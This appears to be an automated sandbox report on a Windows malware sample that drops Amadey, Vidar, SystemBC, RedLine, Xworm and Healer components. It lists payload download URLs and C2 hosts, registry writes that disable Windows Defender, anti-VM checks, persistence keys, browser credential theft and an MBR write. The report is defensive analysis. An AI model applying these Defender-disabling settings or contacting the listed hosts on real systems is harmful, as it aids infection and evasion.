Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
19-02-2025 05:37
Static task
static1
Behavioral task
behavioral1
Sample
c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe
Resource
win10v2004-20250217-en
General
-
Target
c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe
-
Size
2.0MB
-
MD5
2341120afd619b888c8316c0a91d39b8
-
SHA1
a20ac1ddd4110ea8a3e7732c8b49ab84df004ce7
-
SHA256
c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b
-
SHA512
89cefe006dbd385374fb4feee4b32b944bacee34ae160404ab3516ab12bded8c976699d76290fbc9dd911ba9bfa0c906b944a68d06baad25fc1529cc3a204d0b
-
SSDEEP
49152:LAHg7O11+U6WgTQv6Rw/HUtUXYeimDSD4ro:sHYO14UuQv6KHzj7E
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
systembc
cobolrationumelawrtewarms.co:4001
93.186.202.3:4001
-
dns
5.132.191.104
ns1.vic.au.dns.opennic.glue
ns2.vic.au.dns.opennic.glue
Extracted
vidar
https://t.me/g02f04
https://steamcommunity.com/profiles/76561199828130190
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
Signatures
-
Amadey family
-
Detect Vidar Stealer 4 IoCs
resource yara_rule behavioral2/memory/3088-1098-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/3088-1099-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/3088-1137-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/3088-1153-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 -
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/files/0x000a000000023df2-1446.dat family_xworm -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/2132-168-0x0000000000160000-0x00000000005B0000-memory.dmp healer behavioral2/memory/2132-169-0x0000000000160000-0x00000000005B0000-memory.dmp healer behavioral2/memory/2132-380-0x0000000000160000-0x00000000005B0000-memory.dmp healer -
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" Temp9YJWNJDD7ZMZ093IBVRL2OWLXE9UJ7XL.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" Temp9YJWNJDD7ZMZ093IBVRL2OWLXE9UJ7XL.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" Temp9YJWNJDD7ZMZ093IBVRL2OWLXE9UJ7XL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection Temp9YJWNJDD7ZMZ093IBVRL2OWLXE9UJ7XL.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" Temp9YJWNJDD7ZMZ093IBVRL2OWLXE9UJ7XL.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" Temp9YJWNJDD7ZMZ093IBVRL2OWLXE9UJ7XL.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" Temp9YJWNJDD7ZMZ093IBVRL2OWLXE9UJ7XL.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" Temp9YJWNJDD7ZMZ093IBVRL2OWLXE9UJ7XL.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" Temp9YJWNJDD7ZMZ093IBVRL2OWLXE9UJ7XL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications Temp9YJWNJDD7ZMZ093IBVRL2OWLXE9UJ7XL.EXE -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Redline family
-
Systembc family
-
Vidar family
-
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 26 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 6d5890a57c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d2YQIJa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c7ef445ed3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4b2bea3bb2.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempRSPGZQOVMRYPJWA926GQX6WJA8DATYL4.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3omTNLZ.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3omTNLZ.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7741754b5d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ fmrsbin.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5567323d7a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f194fe0c36.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ oVpNTUm.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Temp9YJWNJDD7ZMZ093IBVRL2OWLXE9UJ7XL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1da84c3340.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ oVpNTUm.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ xlxlx.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2b2e2cbb7c.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 6349744b39.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 457170dfca.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 18e34ec326.exe -
Blocklisted process makes network request 64 IoCs
flow pid Process 21 2352 powershell.exe 24 4972 powershell.exe 282 6672 powershell.exe 285 6672 powershell.exe 293 6672 powershell.exe 297 6672 powershell.exe 319 6672 powershell.exe 325 6672 powershell.exe 326 6672 powershell.exe 328 6672 powershell.exe 333 6672 powershell.exe 337 6672 powershell.exe 364 6672 powershell.exe 368 6672 powershell.exe 373 6672 powershell.exe 374 6672 powershell.exe 375 6672 powershell.exe 376 6672 powershell.exe 377 6672 powershell.exe 378 6672 powershell.exe 379 6672 powershell.exe 384 6672 powershell.exe 385 6672 powershell.exe 386 6672 powershell.exe 387 6672 powershell.exe 388 6672 powershell.exe 389 6672 powershell.exe 390 6672 powershell.exe 391 6672 powershell.exe 411 6672 powershell.exe 424 6672 powershell.exe 428 6672 powershell.exe 431 6672 powershell.exe 433 6672 powershell.exe 435 6672 powershell.exe 438 6672 powershell.exe 446 6672 powershell.exe 449 6672 powershell.exe 450 6672 powershell.exe 451 6672 powershell.exe 453 6672 powershell.exe 454 6672 powershell.exe 456 6672 powershell.exe 458 6672 powershell.exe 462 6672 powershell.exe 463 6672 powershell.exe 464 6672 powershell.exe 466 6672 powershell.exe 467 6672 powershell.exe 469 6672 powershell.exe 471 6672 powershell.exe 473 6672 powershell.exe 474 6672 powershell.exe 477 6672 powershell.exe 479 6672 powershell.exe 484 6672 powershell.exe 488 6672 powershell.exe 490 6672 powershell.exe 491 6672 powershell.exe 492 6672 powershell.exe 493 6672 powershell.exe 496 6672 powershell.exe 497 6672 powershell.exe 500 6672 powershell.exe -
pid Process 2040 powershell.exe 1824 powershell.exe 3088 powershell.exe 5480 powershell.exe 2352 powershell.exe 4972 powershell.exe 7120 powershell.exe 5928 powershell.exe -
Downloads MZ/PE file 38 IoCs
flow pid Process 125 920 futors.exe 12 2032 skotes.exe 12 2032 skotes.exe 12 2032 skotes.exe 12 2032 skotes.exe 12 2032 skotes.exe 12 2032 skotes.exe 12 2032 skotes.exe 12 2032 skotes.exe 12 2032 skotes.exe 12 2032 skotes.exe 12 2032 skotes.exe 12 2032 skotes.exe 12 2032 skotes.exe 12 2032 skotes.exe 12 2032 skotes.exe 12 2032 skotes.exe 12 2032 skotes.exe 19 2032 skotes.exe 468 4568 BitLockerToGo.exe 95 920 futors.exe 290 6276 BitLockerToGo.exe 472 2032 skotes.exe 472 2032 skotes.exe 612 5000 4b2bea3bb2.exe 612 5000 4b2bea3bb2.exe 612 5000 4b2bea3bb2.exe 612 5000 4b2bea3bb2.exe 612 5000 4b2bea3bb2.exe 612 5000 4b2bea3bb2.exe 51 920 futors.exe 51 920 futors.exe 51 920 futors.exe 114 920 futors.exe 447 4892 BitLockerToGo.exe 21 2352 powershell.exe 24 4972 powershell.exe 569 5928 powershell.exe -
Uses browser remote debugging 2 TTPs 18 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 3912 chrome.exe 2964 msedge.exe 2008 chrome.exe 6352 msedge.exe 812 msedge.exe 5924 chrome.exe 5216 chrome.exe 5072 msedge.exe 2004 msedge.exe 404 msedge.exe 5600 chrome.exe 1164 msedge.exe 808 chrome.exe 5136 msedge.exe 620 chrome.exe 4468 msedge.exe 6544 chrome.exe 1972 msedge.exe -
Checks BIOS information in registry 2 TTPs 52 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3omTNLZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion oVpNTUm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 18e34ec326.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempRSPGZQOVMRYPJWA926GQX6WJA8DATYL4.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Temp9YJWNJDD7ZMZ093IBVRL2OWLXE9UJ7XL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion xlxlx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7741754b5d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2b2e2cbb7c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5567323d7a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4b2bea3bb2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion fmrsbin.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c7ef445ed3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3omTNLZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1da84c3340.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempRSPGZQOVMRYPJWA926GQX6WJA8DATYL4.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6349744b39.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Temp9YJWNJDD7ZMZ093IBVRL2OWLXE9UJ7XL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3omTNLZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion c7ef445ed3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion xlxlx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f194fe0c36.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6349744b39.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion oVpNTUm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion fmrsbin.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 457170dfca.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 457170dfca.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion oVpNTUm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5567323d7a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6d5890a57c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6d5890a57c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f194fe0c36.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2b2e2cbb7c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3omTNLZ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 18e34ec326.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7741754b5d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4b2bea3bb2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion oVpNTUm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1da84c3340.exe -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation amnew.exe Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation futors.exe Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation 7aencsM.exe Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation mshta.exe -
Drops startup file 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C3hYpvm.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C3hYpvm.exe -
Executes dropped EXE 54 IoCs
pid Process 2032 skotes.exe 4796 oVpNTUm.exe 2568 skotes.exe 2460 3omTNLZ.exe 2004 d67718582a.exe 2592 fmrsbin.exe 2132 Temp9YJWNJDD7ZMZ093IBVRL2OWLXE9UJ7XL.EXE 1452 amnew.exe 920 futors.exe 2400 6d5890a57c.exe 4336 483d2fa8a0d53818306efeb32d3.exe 2332 trano1221.exe 3608 1da84c3340.exe 464 trano1221.exe 2856 con12312211221.exe 2192 c5859bfd97.exe 3456 con12312211221.exe 1244 monthdragon.exe 544 monthdragon.exe 3228 monthdragon.exe 4724 12321321.exe 1480 alex12112.exe 2860 alex12112.exe 3724 88e0f792cc.exe 2964 Ta3ZyUR.exe 2748 Ta3ZyUR.exe 2040 eb522d694c.exe 4084 d2YQIJa.exe 4380 3omTNLZ.exe 4748 c7ef445ed3.exe 2952 7aencsM.exe 3088 7aencsM.exe 5400 DTQCxXZ.exe 6188 skotes.exe 6528 oVpNTUm.exe 6640 futors.exe 5488 qFqSpAp.exe 5860 Bjkm5hE.exe 5992 Bjkm5hE.exe 5228 C3hYpvm.exe 6012 xlxlx.exe 2872 f194fe0c36.exe 5852 7741754b5d.exe 6972 2b2e2cbb7c.exe 5232 6349744b39.exe 6872 5567323d7a.exe 6648 457170dfca.exe 5000 4b2bea3bb2.exe 5920 18e34ec326.exe 536 73645cf365.exe 1640 c25e86d7df.exe 6328 TempRSPGZQOVMRYPJWA926GQX6WJA8DATYL4.EXE 4212 skotes.exe 5928 futors.exe -
Identifies Wine through registry keys 2 TTPs 26 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine fmrsbin.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine 5567323d7a.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine Temp9YJWNJDD7ZMZ093IBVRL2OWLXE9UJ7XL.EXE Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine 1da84c3340.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine d2YQIJa.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine 3omTNLZ.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine oVpNTUm.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine oVpNTUm.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine 3omTNLZ.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine 4b2bea3bb2.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine xlxlx.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine f194fe0c36.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine 2b2e2cbb7c.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine 457170dfca.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine 7741754b5d.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine 6349744b39.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine 18e34ec326.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine TempRSPGZQOVMRYPJWA926GQX6WJA8DATYL4.EXE Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine 6d5890a57c.exe Key opened \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine c7ef445ed3.exe -
Loads dropped DLL 32 IoCs
pid Process 464 trano1221.exe 464 trano1221.exe 464 trano1221.exe 464 trano1221.exe 464 trano1221.exe 464 trano1221.exe 464 trano1221.exe 464 trano1221.exe 464 trano1221.exe 464 trano1221.exe 464 trano1221.exe 464 trano1221.exe 464 trano1221.exe 464 trano1221.exe 464 trano1221.exe 464 trano1221.exe 464 trano1221.exe 464 trano1221.exe 464 trano1221.exe 464 trano1221.exe 464 trano1221.exe 464 trano1221.exe 464 trano1221.exe 464 trano1221.exe 464 trano1221.exe 464 trano1221.exe 464 trano1221.exe 464 trano1221.exe 464 trano1221.exe 464 trano1221.exe 5000 4b2bea3bb2.exe 5000 4b2bea3bb2.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features Temp9YJWNJDD7ZMZ093IBVRL2OWLXE9UJ7XL.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" Temp9YJWNJDD7ZMZ093IBVRL2OWLXE9UJ7XL.EXE -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 9 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\457170dfca.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086795001\\457170dfca.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4b2bea3bb2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086796001\\4b2bea3bb2.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\73645cf365.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086798001\\73645cf365.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d67718582a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086705101\\d67718582a.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086706021\\am_no.cmd" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\eb522d694c.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10008060101\\eb522d694c.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c7ef445ed3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10008070101\\c7ef445ed3.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" C3hYpvm.exe Set value (str) \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c25e86d7df.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1086799001\\c25e86d7df.exe" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 1da84c3340.exe -
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x000b000000023d33-71.dat autoit_exe behavioral2/files/0x0008000000023d8e-680.dat autoit_exe behavioral2/files/0x000a000000024546-4270.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 26 IoCs
